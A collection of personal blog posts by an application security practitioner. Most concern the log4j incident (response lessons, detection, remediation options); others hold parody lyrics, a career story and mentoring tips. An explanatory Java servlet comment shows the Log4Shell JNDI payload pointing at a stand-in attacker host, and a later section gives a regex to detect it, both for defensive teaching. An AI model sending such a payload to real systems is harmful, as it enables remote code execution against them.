Why can’t I get over log4j?

Image of Tanya Janca

I haven't written in my personal blog in a while, and I have good reasons (I moved to a new city, the new place will be a farm, I restarted my international travel, something secret that I can't announce yet, and also did I mention I was a bit busy?). But I still can't get over log4j (see previous article 1, article 2, and the parody song). The sheer volume of work involved in the response was spectacular (one company estimated 100 weeks of work, completed over the course of 8 days), and the damage caused is still unknown at this point. We will likely never know the true extent of the cost of this vulnerability. And this bugs me.

Photos make blog posts better. People have told me this, repeatedly. Here’s a photo, I look like this.

I met up last month with a bunch of CISOs and incident responders to discuss the havoc that was this zero-day threat. What follows are stories, tales, facts and fictions, as well as some of my own observations. I know it's not the perfect storytelling experience you are used to here; bear with me, please.

Short rehash: log4j is a popular Java library used for application logging. A vulnerability was discovered in it that allowed any user to paste a short string of characters into the address bar (or any other input that ends up being logged), and if the application was vulnerable, that user would gain remote code execution (RCE). No authentication to the system was required, making this the simplest attack of all time to gain the highest possible level of privilege on the victim's system. In summary: very, very scary.
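
To make that concrete, here is a tiny, hypothetical sketch of how the attack worked (the servlet, the header and the attacker domain are all made up for illustration; this assumes a vulnerable log4j-core 2.x, before 2.15, on the classpath). Any attacker-controlled value that gets logged is enough; no login required.

// Hypothetical servlet, assuming a vulnerable log4j-core 2.x (before 2.15) is on the classpath.
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;

public class SearchServlet extends HttpServlet {
    private static final Logger LOG = LogManager.getLogger(SearchServlet.class);

    @Override
    protected void doGet(HttpServletRequest req, HttpServletResponse resp) {
        // The attacker sends a header such as:
        //   User-Agent: ${jndi:ldap://attacker.example.com/a}
        // A vulnerable log4j resolves that lookup while formatting the log line,
        // fetches a remote class from the attacker's server, and runs it. That is the RCE.
        LOG.info("Search requested, user agent: {}", req.getHeader("User-Agent"));
    }
}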

Most companies had no reason to believe they had been breached, yet they pulled together their entire security team and various other parts of their org to fight against this threat, together. I saw and heard about a lot of teamwork. Many people I spoke to told me they had their security budgets increased by multitudes, being able to hire several extra people and buy new tools. I was told "Never let a good disaster go to waste". Interesting….

I read several articles from various vendors claiming that they could have prevented log4j from happening in the first place, and for some of them it was true, though for many it was just marketing falsehoods. I find it disappointing that any org would publish an outright lie about the ability of their product, but unfortunately this is still common practice for some companies in our industry.

I happened to be on the front line at the time, doing a 3-month full-time stint (while still running We Hack Purple). I had *just* deployed an SCA (software composition analysis) tool that confirmed for me that we were okay. Then I found another repo. And another. And another. In the end they were still safe, but finding out there had been 5 repos full of code that I was unaware of as their AppSec Lead made me more than a little uncomfortable, even if it was only my 4th week on the job.

I spoke to more than one individual who told me they didn’t have log4j vulnerabilities because the version they were using was SO OLD they had been spared, and still others who said none of their apps did any logging at all, and thus were also spared. I don’t know about you, but I wouldn’t be bragging about that to anyone…

For the first time ever, I saw customers not only ask if vendors were vulnerable, but they asked “Which version of the patch did you apply?”, “What day did you patch?” and other very specific questions that I had never had to field before.

Some vendors responded very strongly, with Contrast Security giving away a surprise tool (https://www.contrastsecurity.com/security-influencers/instantly-inoculate-your-servers-against-log4j-with-new-open-source-tool ) to help people find log4j on servers. They could likely have charged a small fortune, but they did not. Hats off to them. I also heard of one org that was using the new Wiz.io, apparently it did a very fast inventory for them. I like hearing about good new tools in our industry.

I heard of several vendors whose customers demanded "Why didn't you warn us about this? Why can't your xyz tool prevent this?" when in fact their tool had nothing to do with libraries, and therefore this was not at all in the scope of the tool. This tells me that customers were quite frightened. I mean, I certainly was….

Several organizations had their incident response process TESTED for the first time. Many of us realized there were improvements to make, especially when it comes to giving updates on the status of the event. Many people learned to improve their patching process. Or at least I hope they did.

Those that had a WAF, RASP, or CDN were able to throw up some fancy regex and block most requests. Not a perfect or elegant solution, but it saved quite a few companies' bacon and reduced the risk greatly.

I've harped at many clients and students before that if you can't do quick updates to your apps, that is a vulnerability in itself. Log4j proved this as never before. I'm not generally an "I told you so" type of person. But I do want to tell every org "Please prioritize your ability to patch and upgrade frameworks quickly; this is ALWAYS important and valuable as a security activity. It is a worthy investment of your time."

Again, I apologize for this blog post being a bit disjointed. I wasn’t sure how to string so many different thoughts and facts into the same article. I hope this was helpful.

Parody Songs

Image of Tanya halfway through singing this song

For those who are not aware, I used to be a professional musician. I performed both under my own name (Tanya Janca, folk singer) and in several different musical groups, including Couchwrecked, who wrote the song Hottawa.

I just released another parody video and thought I would share it.

“Open Source Ain’t So Good”

Set to the music of "You Know I'm No Good" by Amy Winehouse

“Open Source Ain’t So Good”

Reviewing my dependencies, and it hurt,

My rolled up sleeves, SheHacksPurple shirt

You say “what did I add to my app today?”

And sniffed out insecure log4j

‘Cause you’re my sec champ, my guy

Hand me your code and fly

By the time I scanned your dependencies

My tool lit up like a Christmas tree

I used open source

Like I knew I would

I told you It was trouble

Open Source ain’t so good

Open source is free, like a puppy

You Gotta check for insecurities

Just because the code is there for all to see

Don’t mean that it’s been tested thoroughly

Rush to run my SCA tool

It looks at me and 

says I’m such a fool

This package ain’t supported no more

I cried for us on the kitchen floor

I used open source

Like I knew I would

I told you It was trouble

Open Source ain’t so good

Sweet refactor, Dependencies upgrade

The app is like it was again

I’m testing it all, while you sit and wait

Us PenTesters, we never hesitate

Then I notice the results and it burns

My stomach drop and my guts churn

You shrug and it’s the worst

Who truly stuck the knife in first

I used open source

Like I knew I would

I told you It was trouble

Open Source ain’t so good

I cheated my app

Like I knew I would

I told you It was trouble

Yeah, Open Source ain’t so good

And here is a previous parody I released last month.


Just Release It Anyway

Sung to the Backstreet Boys' "I Want It That Way"

“Just Release It Anyway”

Lyrics

Yeah

You are, setting fires

In my, applications

Believe when I say

I don’t want it that way

Your app, is falling apart

Security isn’t in your heart

When you say

Release it anyway

Tell me why You didn’t fix the bugs I found

Tell me why You Ignored the PenTest result

Tell me why I never wanna hear you say

Release it anyway

Am I your advisor?

Your one security hire

Yes, I know it’s too late

‘Cause you released it anyway

Tell me why You didn’t fix the bugs I found

Tell me why You Ignored the PenTest report

Tell me why I never wanna hear you say

Release it anyway

Our security program has fallen apart From the way we know it should be, yeah

No matter the software I want you to know It’s safety matters to meeeeeeeeeee

You are, setting fires

In my, applications

Believe when I say I don’t want it that way

Ain’t nothin’ but a heartache

Ain’t nothin’ but a mistake (don’t wanna hear you say)

I never wanna hear you say (oh, yeah)

Just release it anyway

Tell me why

Ain’t nothin’ but a heartache

Tell me why

Ain’t nothing but a mistake

Tell me why I never want to hear you say (never wanna hear you say)

Release it anyway

Tell me why

Ain’t nothin’ but a heartache

Ain’t nothin’ but a mistake

Tell me why I never want to hear you say (don’t want to hear you say)

Just Release it anyway

‘Cause I don’t want it that way

The Difference Between Applications and Infrastructure


Recently someone asked me what the difference was between applications and infrastructure. He asked why a Linux operating system wasn't "software", and I said it is software, but it's a perfect, standardized copy, whereas I tend to speak about 'custom software'. We ended up talking for a very long time about it, and I thought a blog post was in order.

Photo by Christian Wiediger on Unsplash

Infrastructure is the operating systems and hardware that applications live on. Think Windows, Linux, containers, and so much more. Sometimes hardware is included in this category (depending on who you talk to), and sometimes it is not. Infrastructure is necessary to run an application; even serverless runs (briefly) on a container. Operating systems are also all standardized, and not unique in nature. For instance, if I'm running Windows Server 2012 R2, and so are you, we both have the same options for patches, configuration, etc. Operating systems are software that speak to hardware.

Applications are software that speak to operating systems, databases, APIs and anything else you can think of. There are custom applications (what I'm almost always talking about: software developed for a specific business need or as a product to sell), COTS (commercial off-the-shelf software, like SharePoint or Confluence, which is configurable, administered by a person or team, and installed locally on a server), and regular old software that you install or access via a web browser and use as-is (no administration required/simpler). More recently there is SaaS, software as a service, which is basically a great big COTS product hosted by someone else (no need for you to patch or otherwise take care of it; you pick your settings and use it).

Infrastructure usually needs to be patched, updated/upgraded, and hardened (secure configuration choices). Patches and upgrades arrive in a prepackaged format, but sometimes these updates can break the applications living on that infrastructure. Testing, and sometimes downtime, is required. This is why so many people say 'patching is hard': it is difficult to plan for testing and downtime, and to ensure everything will go smoothly.

Software, on the other hand, includes many different components that are provided prepackaged (such as a new version of a library or a framework), but when you update them, sometimes other libraries or framework parts break, and/or the custom code that your team wrote can break as well. This means you may need to re-code or rewrite things, or update a whole bunch of things at the same time. I've heard developers refer to this as "dependency hell".

If you have just released something brand new, it's super easy to keep it up to date. Tiny changes present less risk (which is why people love DevOps over waterfall), making it easier to maintain. But because it's sparkling and new… usually management says "hey, please build this new feature, and update that library later". This is how technical debt accrues. It's not operational staff or software developers saying "forget that, I don't care about this"; it's almost always conflicting priorities.

I hope this helps clarify the difference.

Discoveries as a Result of the Log4j Debacle

Me, pre-log4j
Tanya making a silly face.
Happier times, before I knew anything about log4j.

Over the past 2 weeks many people working in IT have been dealing with the fallout of the vulnerabilities and exploits being carried out against servers and applications using the popular Log4j Java library. Information security people have been responding 24/7 to the incident, operations folks have been patching servers at record speeds, and software developers have been upgrading, removing libraries and crossing their fingers. WAFs are being deployed, CDN (Content Delivery Network) rules updated, and we are definitely not out of the woods yet.

​Those of you who know me realize I’m going to skip right over anything to do with servers and head right onto the software angle. Forgive me; I know servers are equally important. But they are not my speciality…

Although I already posted in my newsletter, on this blog and on my YouTube channel, I have more to say. I want to talk about some of the things that I and other incident responders 'discovered' as part of investigations for log4j. Things I've seen for years, that need to change.

After speaking privately to a few CISOs, AppSec pros and incident responders, I can tell you there is a LOT going on with this vulnerability, and it's being compounded by systemic problems in our industry. If you want to share a story with me about this topic, please reach out to me.

Shout-outs to every person working to protect the internet, your customers, your organizations and individuals against this vulnerability.

You are amazing. Thank you for your service.

Let’s get into some systemic problems.

Inventory: Not just for Netflix Anymore

I realize that I am constantly telling people that having a complete inventory of all of your IT assets (including web apps and APIs) is the #1 most important AppSec activity you can do, but people still don't seem to be listening… Or maybe it's on their "to do" list? Marked as "for later"? I find it defeating at times that having a current and accurate inventory is still a challenge for even major players, such as Netflix and other large companies/teams whom I admire. If they find it hard, how can smaller companies with fewer resources get it done? This problem has never been more obvious than while responding to this incident.

Look at past me! No idea what was about to hit her, happily celebrating her new glasses.

​Imagine past me, searching repos, not finding log4j and then foolishly thinking she could go home. WRONG! It turns out that even though one of my clients had done a large inventory activity earlier in the year, we had missed a few things (none containing log4j, luckily). When I spoke to other folks I heard of people finding custom code in all SORTS of fun places it was not supposed to be. Such as:

  • Public Repos that should have been private
  • Every type of cloud-based version control or code repo you can think of: GitLab, GitHub, BitBucket, Azure DevOps, etc. And of course, most of them were not approved/on the official list…
  • On-prem, saved to a file server – some with backups and some without
  • In the same repos everyone else is using, but locked down so that only one dev or one team could see it (meaning no AppSec tool coverage)
  • SVN (Subversion), ClearCase, SourceSafe, and other repos I thought no one was using anymore… that are incompatible with the AppSec tools I (and many others) had at hand.

Having it take over a week just to get access to all the various places the code is kept meant those incident responders couldn't give accurate answers to management and customers alike. It also meant that some of them were vulnerable, but they had no way of knowing.

Many have brought up the concept of SBOM (software bill of materials, the list of all dependencies a piece of software has) at this time. Yes, having a complete SBOM for every app would be wonderful, but I would have settled for a complete list of apps and where their code was stored. Then I can figure out the SBOM stuff myself… But I digress.

Inventory is valuable for more than just incident response. You can't be sure your tools have complete coverage if you don't know your assets. Imagine if you painted *almost* all of a fence. That one part you missed would become damaged and age faster than the rest of the fence, because it's missing the protection of the paint. Imagine year after year, you refresh the paint, except that one spot you don't know about. Perhaps it gets water damage or starts to rot? It's the same with applications; they don't always age well.

We need a real solution for inventory of web assets. Manually tracking this stuff in MS Excel is not working, folks. This is a systemic problem in our industry.

Lack of Support and Governance for Open-Source Libraries

This may or may not be the biggest issue, but it is certainly the most talked about throughout this situation. The question posed most often is "Why are so many huge businesses and large products depending on a library supported by only three volunteer programmers?" and I would argue the answer is "because it works and it's free". This is how open-source stuff works. Why not use free stuff? I did it all the time when I was a dev and I'm not going to trash other devs for doing it now…. I will let others harp on this issue, hoping they will find a good solution, and I will continue on to other topics for the rest of this article.

Lack of Tooling Coverage

The second problem incident responders walked into was their tools not being able to scan all the things. Let's say you're amazing and you have a complete and current inventory (I'm not jealous, YOU'RE JEALOUS); that doesn't mean your tools can see everything. Maybe there's a firewall in the way? Maybe the service account for your tool isn't granted access, or has access but the incorrect set of rights? There are dozens of reasons your tool might not have complete coverage. I heard from too many teams that they "couldn't see" various parts of the network, or their scanning tools weren't authorized for various repos, etc. It hurts just to think about; it's so frustrating.

Luckily for me I’m in AppSec and I used to be a dev, meaning finding workarounds is second nature for me. I grabbed code from all over the place, zipping it up and downloading it, throwing it into Azure DevOps and scanning it with my tools. I also unzipped code locally and searched simply for “log4j”. I know it’s a snapshot in time, I know it’s not perfect or a good long-term plan. But for this situation, it was good enough for me. ** This doesn’t work with servers or non-custom software though, sorry folks. **
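
If you want to try the same kind of quick-and-dirty snapshot search yourself, here is a rough sketch of the idea (my own illustration, not a polished tool; the file types it checks are assumptions). It walks a folder of downloaded code and flags file names that mention log4j, plus Maven and Gradle build files that reference it.

import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.Path;
import java.util.stream.Stream;

public class Log4jHunt {
    public static void main(String[] args) throws IOException {
        // Point this at the folder where you unzipped all the code you gathered.
        Path root = Path.of(args.length > 0 ? args[0] : ".");
        try (Stream<Path> paths = Files.walk(root)) {
            paths.filter(Files::isRegularFile).forEach(p -> {
                String name = p.getFileName().toString().toLowerCase();
                try {
                    if (name.contains("log4j")) {
                        // Jar files and copied-in source are the most telling hits.
                        System.out.println("File name hit: " + p);
                    } else if (name.equals("pom.xml") || name.endsWith(".gradle")) {
                        // Build files that reference log4j deserve a closer look.
                        if (Files.readString(p).toLowerCase().contains("log4j")) {
                            System.out.println("Build file hit: " + p);
                        }
                    }
                } catch (IOException e) {
                    System.err.println("Could not read " + p + ": " + e.getMessage());
                }
            });
        }
    }
}

Just like my manual searching, this only catches direct references; a proper SCA tool will also find log4j pulled in transitively by other dependencies.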

But this points to another industry issue: why were our tools not set up to see everything already? How can we tell if our tool has complete coverage? We (theoretically) should be able to reach all assets with every security tool, but this is not the case at most enterprises, I assure you.

Undeployed Code

This might sound odd, but the more places I looked, the more I found code that was undeployed, “not in use” (whyyyyyyy is it in prod then?), the project was paused, “Oh, that’s been archived” (except it’s not marked that way), etc. I asked around and it turns out this is common, it’s not just that one client… It’s basically everyone. Code all over the place, with no labels or other useful data about where else it may live.

Then I went onto Twitter, and it turns out there isn’t a common mechanism to keep track of this. WHAT!??!?! Our industry doesn’t have a standardized place to keep track of what code is where, if it’s paused, just an example, is it deployed, etc. I feel that this is another industry-level problem we need to solve; not a product we need to buy, but part of the system development life cycle that ensures this information is tracked. Perhaps a new phase or something?

Lack of Incident Response/Investigation Training

Many people I spoke to who were part of the investigations did not have training in incident response or investigation. This includes operations folks and software developers who had no idea what we need or want from them during such a crucial moment. When I first started responding to incidents, I was also untrained. I've honestly not had nearly as much training as I would like, with most of what I have learned coming from on-the-job experience and job shadowing. That said, I created a FREE mini course on incident response that you can sign up for here. It can at least teach you what security wants and needs from you.

The most important part of an incident is appointing someone to be in charge (the incident manager). I saw too many places where no one person was IN CHARGE of what was happening. Multiple people giving quotes to the media, to customers, or other teams. Different status reports that don’t make sense going to management. If you take one thing away from this article it should be that you really need to speak with one voice when the crap hits the fan….

No Shields

For those attempting to protect very old applications (for instance, any apps using log4j 1.x versions), you should consider getting a shield for your application. And by "shield" I mean put it behind a CDN (Content Delivery Network) like CloudFlare, a WAF (Web Application Firewall) or a RASP (Runtime Application Self-Protection).

Is putting a shield in front of your application as good as writing secure code? No. But it’s way better than nothing, and that’s what I saw a lot of while responding and talking to colleagues about log4j. NOTHING to protect very old applications… Which leads to the next issue I will mention.

Ancient Dependencies

Several teams I advised had what I would call "ancient dependencies": dependencies so old that the application would require re-architecting in order to upgrade them. I don't have a solution for this, but it is part of why log4j is going to take a very, very long time to square away.

Technical debt is security debt.

– Me

Solutions Needed

I usually try not to share problems without solutions, but these issues are bigger than me or the handful of clients I serve. These problems are systemic. I invite you to comment with solutions or ideas about how we could try to solve these problems.

I want to talk about Log4j

What my face looked like when I figured out how scary this log4j thing is.

Lots of people are talking about how Log4J affects servers, but if you subscribe to my newsletter or read my blog, you probably want to know about your apps. Let’s talk about what the problem is, how to figure out if you have it, then what to do about it.

Problem: this Java logging dependency has a vulnerability in it that allows an attacker to take over your web server and run commands from it. They can run this attack before a login screen (unauthenticated). This is the scariest possible situation from a security viewpoint.

My face when I understood how scary log4j is.

Do you have this problem? You can search for it in a bunch of ways, but I suggest just going to your code repo and searching for "*log4j*". If you find nothing, ALSO search using any sort of dependency tool. This could be the dependency graph in GitHub, Snyk, OWASP Dependency-Check, WhiteSource, etc. These are also often called "Software Composition Analysis" tools, or SCA for short.

Versions 2.x up to and including 2.16 are vulnerable (yes, even the 2.15 and 2.16 'fixes' turned out to be vulnerable); at the time of writing, 2.17 is the version to upgrade to.

Versions 1.x are only vulnerable if you call the JMSAppender functionality. You can look in your code for “JMSAppender” to see if you are calling it. If you are, you are vulnerable. If not, you’re good.
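
If you are not sure what you are looking for, a programmatic log4j 1.x JMSAppender setup looks roughly like the sketch below (the broker URL and binding names are made-up placeholders). The same appender can also be wired up in log4j.properties or log4j.xml, so search your configuration files for "JMSAppender" too.

// Hypothetical log4j 1.x setup; if you find code (or config) like this, you are affected.
import org.apache.log4j.Logger;
import org.apache.log4j.net.JMSAppender;

public class LegacyLoggingSetup {
    public static void configure() {
        JMSAppender appender = new JMSAppender();
        // These values are placeholders for illustration only.
        appender.setInitialContextFactoryName("org.apache.activemq.jndi.ActiveMQInitialContextFactory");
        appender.setProviderURL("tcp://broker.internal.example:61616");
        appender.setTopicConnectionFactoryBindingName("ConnectionFactory");
        appender.setTopicBindingName("logTopic");
        appender.activateOptions();
        Logger.getRootLogger().addAppender(appender);
    }
}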

If you’re going to rule it out, make absolutely sure. If you don’t have it, go back to your week and chill. If you do, let’s get into that.

NOTE: Email your security team (appsec team) and let them know you don’t have it. They will be SO HAPPY.

Now onto if you have it.

Okay, so you have log4j and you think your week is ruined, but maybe it's not. For each instance you find, make a list, to document it and to give to security later. Verify whether the code has actually been deployed somewhere or not. When I did some IR this weekend, most instances I found were undeployed.

If the code has not been deployed anywhere, mark it as "do not deploy" and move on. Anything that HAS been deployed: where? WHERE is it deployed/where does it live? Behind a WAF or CDN? If so, add the rules to block this attack. CloudFlare and CloudFront both offer them; turn them on!

If you have your own RASP or WAF and there are no rules available yet from your vendor (ask them if you don't see any, and tell them you want one), make your own "virtual patch". Work with InfoSec to write a regex that blocks the attack, or fish one off of the internet (you are not the only one with this problem).
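
To give you an idea of what such a rule looks like, here is a minimal sketch of a detection pattern (my own illustration, not a vendor rule). Be warned: attackers quickly started obfuscating the string with nested lookups such as ${${lower:j}ndi:...}, so a simple pattern like this is a stopgap, not a fix.

// A minimal "virtual patch" style check, for illustration only.
import java.util.regex.Pattern;

public class JndiLookupFilter {
    // Catches the plain form of the attack string, e.g. ${jndi:ldap://...}
    private static final Pattern SUSPICIOUS =
            Pattern.compile("\\$\\{\\s*jndi\\s*:", Pattern.CASE_INSENSITIVE);

    public static boolean looksLikeLog4Shell(String input) {
        return input != null && SUSPICIOUS.matcher(input).find();
    }

    public static void main(String[] args) {
        System.out.println(looksLikeLog4Shell("${jndi:ldap://attacker.example.com/a}")); // true
        System.out.println(looksLikeLog4Shell("Mozilla/5.0 (normal user agent)"));        // false
    }
}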

To be clear, if you make a virtual patch, this is a temporary measure, and you need to 1) monitor it to make sure it’s working, plus 2) upgrade the versions of Log4J as soon as you can. Don’t forget please. 😀

Worst case scenario: You have log4J, nothing to help you block it, and it’s a vulnerable version.

It’s go time.

Option 1: "accept the risk" and do nothing to block it. You will still monitor the situation, but that is all. You will instead spend your efforts on releasing the upgraded version of your software as soon as humanly possible. For some organizations, this is the only option. Don't feel bad; use that energy on the update instead. Ensure you test thoroughly; you don't want to release patches like the ones our industry saw during Meltdown/Spectre, which broke the patched systems worse than the vulnerability would have.

Option 2: Shut off the vulnerable systems. Immediately. If your business can have a few systems down until you figure out how to do something better, this *might* present less risk. There are currently many systems all over the internet being turned off, in the short term. There is no shame in doing this if it’s your best option. I’d rather have egg on my face than an exploited server.

Option 3: Go through your code and remove this dependency from your project, then comment out the code that calls it. When you are ready to apply the upgrade/patch, you will add it and turn it back on. Stop logging, just for now. This is the only situation where I would ever recommend removing logging. Test it thoroughly before deploying and make sure you don’t have any sort of “backup logging” that could interfere or spoil your efforts.


No matter what you decide: Tell the InfoSec team. Tell your management. Do not make these decisions solo.


I made a video about it as well. This topic is important to me, and it should be to you too.

Log4J Affecting Civilians

This vulnerability will affect many systems, including the ones you use at home. Here are some tips to protect your personal devices and home network (tell your friends).

  • Apply updates. Especially this week and next week. If your computer, phone or any piece of software wants an update, say yes. Updates in general are great; they often contain security fixes as well as new features.
  • At some point this week make time to call your internet provider and ask if your router or modem has any updates for log4j. A lot of *devices* are going to be vulnerable, and most of us forget about our modems.
  • If you have “smart” devices at home, check for updates on them too!

More tips!

While we’re at it, here are a few tips for securing your digital self (again, tell your friends!):

  • Turn on Multi-Factor Authentication (MFA) or two-factor authentication (2FA), on all your online accounts that are important to you. Your banking accounts, government services, shopping accounts that have a credit card saved, etc.
  • Get a password manager. Then change and save your passwords into it, one by one, as you visit all your favourite sites. Let it auto-generate unique passwords for you.
  • Think twice before you click on a link in an email if you were not expecting to receive that email. Verify who it’s from, that it’s a legitimate website, and that the link starts with a domain that you recognize. If you’re not sure, copy the link into google.com (not the address bar, go to the search engine website) then add “phishing” to your search and see what it says.
  • Never give personal information, such as pictures of your ID, your social insurance number, your home address, date of birth, etc. to anyone on the internet.

My Career Story

Me, smiling

I started coding at 17 years old, and it was love at first sight.

I got great marks in all of my classes in high school, but loved computer science because in every class, I could “make something out of nothing.” Computer science runs deep in my family as almost all of my aunts and uncles are computer scientists, and my cousins are engineers, scientists and programmers. When I announced that I wanted to go to college for computer science my family responded with “what else would you take?” It wasn’t until years after working in tech that I realized that this is not an experience that most young women share.

I landed my first job in tech at age 18, and haven’t stopped since, despite several career setbacks, harassment and toxic work environments. I realize this might not seem very encouraging, but I have to tell you; things in tech have really improved. I’ve had the fortune of work experience in a variety of different situations both in computer science and in my other passion, music. Both careers taught me the value of collaborating with others, confronting differences, and taking constructive criticism well. It’s also given me the benefit of becoming more resilient when it comes to unpleasant situations or less-than-constructive comments made in the workplace.

For many years, I was a programmer by day and a musician at night. My successful music career allowed me to play in countless venues and bars around town, and it taught me many lessons that have since turned out to be very helpful in tech, such as how to handle hecklers, how to capture the attention of a drunk and belligerent crowd, and what the best way to throw someone off a stage is. As you can imagine, there were challenges to being a young 20-something woman in a hardcore punk band.

Later in my career I met an ethical hacker who was also in a band and we became friends. He spent the next 1.5 years convincing me to join him as his apprentice and learn how to hack. I became fascinated with the security of software; I wanted to know everything. I joined my local OWASP chapter and almost immediately became a chapter leader, which helped me greatly since I had the chance to invite experts on topics that I was interested in to come speak for us. I also met my next 3 professional mentors through OWASP, who taught me even more. OWASP is an incredibly supportive and amazing community; I strongly recommend that everyone join their local chapter.

OWASP Montreal, I drove there with my mom to speak at lunch time. I missed a day of work for it.

At this point in my career I felt like I had a thirst for knowledge that could not be quenched. Although I managed to switch over from software development to a full time security job, I was frustrated that there was no budget for me to go on the types of advanced training that I was interested in. Then one of my professional mentors convinced me to speak at a conference, and they let me in FOR FREE.

For the next 2 years, I spoke at meetups and local events, taught myself as much as I could, and worked in application security helping developers make more secure apps. I loved it, but I kept striving for more. I wanted to do more modern types of application security, and I realized that the organizations I worked for were not very modern, and were resistant to change. I found that my drive and ambition were difficult for certain managers, and this became a point of friction for me in the workplace.

Then I broke through from meetups into speaking at conferences. I honestly couldn't believe it when I received the email saying that I had been accepted to speak at AppSec EU, the international OWASP conference. I discovered that all of my musical stage performance skills transferred over, and that with all of my practice at meetups I had become good at public speaking. After AppSec EU, I had invitations to speak all over the world. As conferences started sending me plane tickets, I took time off work and went off to learn for free. I realized that a career shift was necessary. I knew that I had something to offer to the right employer, but I wasn't quite sure what that would be… Then Microsoft reached out to me.

A Microsoft representative said that he had heard about me, and wanted to interview me for a “Developer Advocate” position. I had no idea at that point that “developer relations” was a job, and when he described what the job would be I said “I already do that, for free.” It took him about 20 minutes to convince me that he was not kidding, this was a real job, and he was actually from Microsoft. Before I knew it, I was traveling the planet, learning about cloud security, working with absolutely brilliant people and so much more. All the while I was *getting paid* to do it! Talk about a dream!

During my many years traveling and talking to the community, I learned a lot about my industry, both good and bad. I learned that software developers had a lot of aches and pains in regards to security that I had also felt when I was a developer, and especially during my work in incident response and AppSec. My goal in being a developer and cloud advocate was to help push the industry forward, and to help people create more secure software, everywhere. During this time I founded the #CyberMentoringMonday online initiative and the WoSEC (Women of Security) organization, released countless articles, videos and podcasts, and spoke regularly at security events. Although I definitely felt I was helping many people in my industry, I felt like I could do even more. I also felt the constant travel was extremely exciting, but also exhausting and perhaps not the most efficient way to help the most people. I wanted to figure out how to make a bigger difference, and ’scale’ myself in a more effective manner.

With that in mind, I started to devise a plan: focus my efforts in a more concise way in order to deliver more impact. Do fewer things, but do those things in a very big way. I decided to choose two big goals: to write a book and to start my own company. And I decided I would just go for it, even if it was scary.

I realized at this point that I was going to have to leave Microsoft to pursue my new career goals. I decided to start my own online training academy, We Hack Purple. We have a podcast, community and courses, it’s a dream come true!

I am also in the process of writing my first book! It’s an intro to AppSec, “Alice and Bob Learn Application Security”, and I’m excited to share it with the community at large when it’s ready. Even though I am at the very beginning of both of these adventures, you better believe I plan to knock them out of the park! ** Alice and Bob Learn AppSec is now available worldwide!

If I can offer advice to you it is this: if you want it, go get it. Don’t let anyone tell you that you can’t reach greatness; you can, you just need to be prepared to work like you’ve never worked before. The Information Security industry needs all the help it can get, and we definitely need you. Yes you, the person reading this right now. Please join us, and help us make the world a better and more secure place.

I have a mailing list, please subscribe, it’s free!

#CyberMentoringMonday

WoSEC Ottawa

Some people have been asking me online how to be a good mentor. Here are some thoughts for all of you. 😀

Some mentees don’t listen, and are not willing to put in the work. Some of them will astound you and excel beyond your wildest dreams. The key is finding a good match for you, and for them.

It’s your job as a mentor to try to help your mentee any way you can. That can be through advice, loaning them a book, sharing resources, introducing them to people that can help them, referring them for a job (if appropriate) or other opportunities.

WoSEC Ottawa— Women of Security

Example: I wrote an essay to explain to a conference why one of my mentees deserved a diversity grant. She has worked SO HARD to teach herself and change careers. She won the grant because of her hard work, AND my essay. It took me 30 minutes, and she benefited.

Example 2: I brainstormed talk ideas with a mentee, then she built an amazing proof of concept. I asked a conference that I was keynoting to book her, even though she’d never spoken before. She was AMAZING! Out of this world! I knew she would be good, but she was 10 times better than I would have dared to hope for.

Example 3: When I’m invited to speak somewhere but cannot make it, I ask if they would like me to recommend someone else. I have a list of people who are not well-known, but who are amazing. I always recommend one of them to take my place. I advocate for them.

Example 4: I asked a friend to let one of my mentees into his very expensive training for free, and he said yes. I let her stay in my hotel room with me so she could afford the trip. It cost me one favour and sharing my room to give her a huge leg up for her career.

I use the power and privileges of my current role to help others, and you can too. You may not even realize how much power you have until you start helping someone.

Sometimes it’s recommending or loaning someone the right book. Sometimes it’s about letting them have a place in your training, workshop, talk, or conference for free. Sometimes it’s helping them when they are stuck at work on a technical problem and you give them the answer. Maybe you will introduce them to the person who will hire them some day. It’s about helping however you can.

The key with mentoring is that they can trust you, and that you have their best interests at heart. It’s not about being perfect or knowing everything. It’s about your motivations.

Good luck folks!

#CyberMentoringMonday

Security bugs are fundamentally different than quality bugs

This topic has come up a few times this year in question period: arguments that quality bugs and security bugs ‘have equal value’, that security testing and QA are ‘the same thing’, that security testing should ‘just be performed by QA’ and that ‘there’s no specific skillset’ required to do security testing versus QA. This post will explain why I fundamentally disagree with all of those statements.

First some definitions.

A software bug is an error, flaw, failure or fault in a computer program or system that causes it to produce an incorrect or unexpected result, or to behave in unintended ways.

A security bug is specifically a bug that causes a vulnerability. A vulnerability is a weakness which can be exploited by a Threat Actor, such as an attacker, to perform unauthorized actions within a computer system.

QA looks for software bugs (any kind); security testers look for vulnerabilities. This is the main difference, their goals.

Just as all women are human beings but not all human beings are women, all security bugs are defects but not all defects are security bugs.

Now let’s dissect each of the claims above.

1. Quality bugs and security bugs ‘have equal value’.

If a security bug leads only to a low-risk vulnerability, it does not have 'the same value' as a non-security-related bug that is making the system crash over and over. Likewise, a security bug that creates the potential for a data breach, or worse, is not equivalent to the fonts not matching from page to page. I am of the opinion that security bugs are more likely to be able to cause catastrophic business harm than a regular bug, due to the fact that if your system has fallen under the control of a malicious actor, creativity is the only limit. Malicious actors never cease to amaze me with the damage they can do.

Someone is wearing camouflage. — #MSIgniteTheTour, Toronto, 2019

2. Security testing and QA are ‘the same thing’

The goals of security testing and quality assurance testing are different, which I feel makes them obviously different (if they were the same, why would they not be called the same thing?); however, I want to dig deeper into this idea.

Security is a part of quality.

I often say "Security is a part of quality" because I believe this to be true. You cannot have a high-quality product that is insecure; it is an oxymoron. If an application is fast, beautiful and does everything the client asked for, but someone breaks into it the first day that it is released, I don't think you will find anyone willing to call it a high-quality application.

There are many different types of testing:

· Unit Testing — small, automatable tests that verify small units of code (functions/subroutines) each do the one thing they are supposed to do.

· Integration Testing — tests between different components to ensure they work well together. Larger than unit tests, but less intense than end-to-end tests.

· End-To-End Testing — ensuring the flow of your application from start to finish is as expected

· User Acceptance Testing (UAT) — manual and/or automated testing of client requirements (often used interchangeably with 'QA')

· User Experience Testing (UX) — verifying that the application or product is easy to use and understand from a user perspective

· Regression Testing — verifying that new changes have not broken anything that was already tested, a ‘retesting’ of all previously released functionality

· Stress/Performance/Load Testing — verifying your application can handle large amounts of usage/traffic while continuing to perform well, generally performed using software tools (although each of these three have slight differences, they are all generally lumped in together)

